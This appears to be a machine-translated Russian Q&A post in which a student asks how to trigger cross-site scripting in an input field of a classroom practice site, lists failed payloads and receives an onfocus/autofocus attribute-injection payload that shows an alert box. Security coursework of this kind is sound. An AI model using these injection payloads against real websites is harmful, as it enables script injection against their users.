Я работаю над попыткой найти уязвимости на фальшивом веб-сайте для класса, и мне было интересно, как запустить код XSS в это поле ввода?
<form name="friendForm" method="POST" action="/Tunestore/addfriend.do"> Friend name: <input type="text" name="friend" value="" <script>alert(1)</script>"><br> <input type="submit" value="Submit"> </form>
Я пробовал это, но это не сработало:
"> <script>alert(1)</script>
" onfocus="alert(1)"
" onclick="alert(1)
Попробуйте это:
"onfocus =" alert (1) "autofocus ="
Это расширится до: <'input type = "text" name = "friend" value ="" onfocus = "alert (1)" autofocus = "" />
, который вызовет окно с предупреждением, демонстрирующее XSS.